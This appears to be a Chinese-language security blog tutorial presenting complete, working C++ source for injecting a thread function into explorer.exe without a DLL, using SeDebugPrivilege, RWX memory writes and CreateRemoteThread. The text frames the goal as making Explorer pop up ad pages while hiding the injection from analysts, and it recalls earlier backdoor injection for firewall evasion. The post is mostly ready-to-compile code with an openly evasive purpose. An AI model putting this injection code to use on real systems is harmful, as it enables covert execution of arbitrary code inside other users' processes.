安全之路 —— 無DLL檔案實現遠端程序注入
阿新 • • 發佈:2019-01-26
簡介
在之前的章節中,筆者曾介紹過有關於遠端執行緒注入的知識,將後門.dll檔案注入explorer.exe中實現繞過防火牆反彈後門。但一個.exe檔案總要在注入時捎上一個.dll檔案著實是怪麻煩的,那麼有沒有什麼方法能夠不適用.dll檔案實現注入呢?
答案是有的,我們可以直接將功能寫線上程函式中,然後直接將整個函式注入,這個方法相較之於DLL注入會稍微複雜一些,適用於對一些體積比較小的程式進行注入。但是要注意動態連結庫的地址重定位問題,因為正常的檔案一般會預設載入kernel32.dll檔案,而不會載入其他DLL,且只有kernel32.dll與user32.dll檔案可以保證在本地和目的程序中的載入地址是一樣的,所以最好要在遠端執行緒函式中手動利用LoadLibrary和GetProcessAddress函式強制載入一遍DLL檔案。Visual Studio在編譯此類功能的檔案時建議關閉編譯器的“/GS”選項,還要其他需要注意的地方可參考此 連結。
下面我們藉助此方法實現讓Windows資源管理器explorer.exe實現彈網頁(發廣告)的功能,而分析人員卻無法從程式依賴的動態連結庫中找到我們注入執行緒用的DLL檔案,達到了一定的隱藏效果。
程式碼實現
//////////////////////////////
//
// FileName : InjectProcess.cpp
// Creator : PeterZheng
// Date : 2018/8/18 0:35
// Comment : Inject Process Without Dll File
//
//////////////////////////////
#include <cstdio>
#include <cstdlib>
#include <iostream>
#include <string>
#include <string.h>
#include <windows.h>
#include <strsafe.h>
#include <tlhelp32.h>
#define MAX_LENGTH 50
#define NORMAL_LENGTH 20
#pragma warning(disable:4996)
using namespace std;
//遠端執行緒函式引數
typedef struct _RemoteParam
{
CHAR szOperation[NORMAL_LENGTH];
CHAR szAddrerss[MAX_LENGTH];
CHAR szLb[NORMAL_LENGTH];
CHAR szFunc[NORMAL_LENGTH];
LPVOID lpvMLAAdress;
LPVOID lpvMGPAAddress;
LPVOID lpvSEAddress;
}RemoteParam;
//遠端執行緒函式(主體)
DWORD WINAPI ThreadProc(RemoteParam *lprp)
{
typedef HMODULE(WINAPI *MLoadLibraryA)(IN LPCTSTR lpFileName);
typedef FARPROC(WINAPI *MGetProcAddress)(IN HMODULE hModule, IN LPCSTR lpProcName);
typedef HINSTANCE(WINAPI *MShellExecuteA)(HWND hwnd, LPCSTR lpOperation, LPCSTR lpFile, LPCSTR lpParameters, LPCSTR lpDirectory, INT nShowCmd);
MLoadLibraryA MLA;
MGetProcAddress MGPA;
MShellExecuteA MSE;
MLA = (MLoadLibraryA)lprp->lpvMLAAdress;
MGPA = (MGetProcAddress)lprp->lpvMGPAAddress;
lprp->lpvSEAddress = (LPVOID)MGPA(MLA(lprp->szLb), lprp->szFunc);
MSE = (MShellExecuteA)lprp->lpvSEAddress;
MSE(NULL, lprp->szOperation, lprp->szAddrerss, NULL, NULL, SW_SHOWNORMAL);
return 0;
}
//獲取PID
DWORD GetProcessID(CHAR *ProcessName)
{
PROCESSENTRY32 pe32;
pe32.dwSize = sizeof(pe32);
HANDLE hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hProcessSnap == INVALID_HANDLE_VALUE)
{
printf("CreateToolhelp32Snapshot error");
return 0;
}
BOOL bProcess = Process32First(hProcessSnap, &pe32);
while (bProcess)
{
if (strcmp(strupr(pe32.szExeFile), strupr(ProcessName)) == 0)
return pe32.th32ProcessID;
bProcess = Process32Next(hProcessSnap, &pe32);
}
CloseHandle(hProcessSnap);
return 0;
}
//獲取許可權
int EnableDebugPriv(const TCHAR *name)
{
HANDLE hToken;
TOKEN_PRIVILEGES tp;
LUID luid;
if (!OpenProcessToken(GetCurrentProcess(),
TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,
&hToken))
{
printf("OpenProcessToken Error!\n");
return 1;
}
if (!LookupPrivilegeValue(NULL, name, &luid))
{
printf("LookupPrivilege Error!\n");
return 1;
}
tp.PrivilegeCount = 1;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
tp.Privileges[0].Luid = luid;
if (!AdjustTokenPrivileges(hToken, 0, &tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL))
{
printf("AdjustTokenPrivileges Error!\n");
return 1;
}
return 0;
}
//遠端執行緒注入函式
BOOL InjectProcess(const DWORD dwPid)
{
if (EnableDebugPriv(SE_DEBUG_NAME)) return FALSE;
HANDLE hWnd = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);
if (!hWnd) return FALSE;
RemoteParam rp;
ZeroMemory(&rp, sizeof(RemoteParam));
rp.lpvMLAAdress = (LPVOID)GetProcAddress(LoadLibrary("Kernel32.dll"), "LoadLibraryA");
rp.lpvMGPAAddress = (LPVOID)GetProcAddress(LoadLibrary("Kernel32.dll"), "GetProcAddress");
StringCchCopy(rp.szLb, sizeof(rp.szLb), "Shell32.dll");
StringCchCopy(rp.szFunc, sizeof(rp.szFunc), "ShellExecuteA");
StringCchCopy(rp.szAddrerss, sizeof(rp.szAddrerss), "https://www.baidu.com");
StringCchCopy(rp.szOperation, sizeof(rp.szOperation), "open");
RemoteParam *pRemoteParam = (RemoteParam *)VirtualAllocEx(hWnd, 0, sizeof(RemoteParam), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (!pRemoteParam) return FALSE;
if (!WriteProcessMemory(hWnd, pRemoteParam, &rp, sizeof(RemoteParam), 0)) return FALSE;
LPVOID pRemoteThread = VirtualAllocEx(hWnd, 0, 1024 * 4, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (!pRemoteThread) return FALSE;
if (!WriteProcessMemory(hWnd, pRemoteThread, &ThreadProc, 1024 * 4, 0)) return FALSE;
HANDLE hThread = CreateRemoteThread(hWnd, NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteThread, (LPVOID)pRemoteParam, 0, NULL);
if (!hThread) return FALSE;
return TRUE;
}
//主函式
int WINAPI WinMain(_In_ HINSTANCE hInstance, _In_opt_ HINSTANCE hPrevInstance, _In_ LPSTR lpCmdLine, _In_ int nShowCmd)
{
CHAR szProcName[MAX_LENGTH] = "\0";
StringCchCopy(szProcName, MAX_LENGTH, "explorer.exe");
InjectProcess(GetProcessID(szProcName));
ExitProcess(0);
return 0;
}